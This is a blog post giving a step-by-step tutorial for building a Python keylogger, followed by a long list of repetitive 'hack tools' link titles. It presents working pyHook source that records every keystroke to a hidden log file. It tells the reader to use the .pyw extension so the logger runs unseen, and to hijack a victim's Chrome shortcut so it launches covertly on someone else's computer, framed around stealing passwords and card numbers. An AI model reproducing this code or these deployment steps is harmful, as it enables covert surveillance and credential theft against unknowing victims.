ブログはじめました。日本語だと不便です。機能も少ないです。 なのでそのうち他のサービスを探します。ここはとりあえず実験的に。

土曜日, 5月 27, 2023

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.

Read more


  1. Hacking Tools For Kali Linux
  2. Hacker Tools For Windows
  3. Underground Hacker Sites
  4. Hacks And Tools
  5. Physical Pentest Tools
  6. Pentest Tools For Mac
  7. Best Hacking Tools 2020
  8. Hacker Tools For Mac
  9. Hack Tools Github
  10. Hacker Tools Apk
  11. Hack Tools Pc
  12. Beginner Hacker Tools
  13. Hack App
  14. Pentest Tools Website Vulnerability
  15. Hacker Security Tools
  16. Hack Tools For Mac
  17. Pentest Tools Website Vulnerability
  18. Nsa Hack Tools
  19. Hacking Tools Download
  20. Hacking Tools For Windows Free Download
  21. Hacking Tools 2019
  22. Hacks And Tools
  23. Physical Pentest Tools
  24. Hack Tool Apk No Root
  25. Hacker Hardware Tools
  26. Hack Website Online Tool
  27. Pentest Tools For Mac
  28. Hak5 Tools
  29. Hacker Tools Software
  30. Hacker Tools Apk Download
  31. Hack Tools For Pc
  32. Hack And Tools
  33. New Hack Tools
  34. Hacking Tools Github
  35. New Hacker Tools
  36. Hacker Tools Mac
  37. Hack Tools Mac
  38. Hack Tools Download
  39. Hack Tools Online
  40. Hacker Hardware Tools
  41. Ethical Hacker Tools
  42. Hack Apps
  43. Pentest Tools Github
  44. Beginner Hacker Tools
  45. Hack Tool Apk
  46. Tools For Hacker
  47. Tools For Hacker
  48. Hacker Hardware Tools
  49. Hacker Tools Apk Download
  50. Pentest Tools Bluekeep
  51. Pentest Tools Kali Linux
  52. Pentest Tools Online
  53. Best Hacking Tools 2020
  54. Hacking Tools Windows
  55. Pentest Tools Tcp Port Scanner
  56. Hacking Tools Pc
  57. Hack Tools Pc
  58. Hackers Toolbox
  59. Hack Tools Mac
  60. New Hacker Tools
  61. Hacker Tools Hardware
  62. Pentest Tools Online
  63. Hack Tools Download
  64. Pentest Tools Kali Linux
  65. Bluetooth Hacking Tools Kali
  66. Pentest Tools For Mac
  67. Hacking Tools Hardware
  68. Pentest Tools For Android
  69. Hack Tools
  70. Pentest Tools Review
  71. Hack Tools
  72. Hacking Tools Windows 10
  73. Pentest Tools Url Fuzzer
  74. Best Hacking Tools 2020
  75. Hack Tools Pc
  76. Termux Hacking Tools 2019
  77. Hacker Tools 2020
  78. Hack Tools Mac
  79. Pentest Tools For Windows
  80. Pentest Tools Port Scanner
  81. New Hacker Tools
  82. Black Hat Hacker Tools
  83. Hacker
  84. Hak5 Tools
  85. Hacker Tool Kit
  86. Pentest Tools Url Fuzzer
  87. Pentest Tools For Android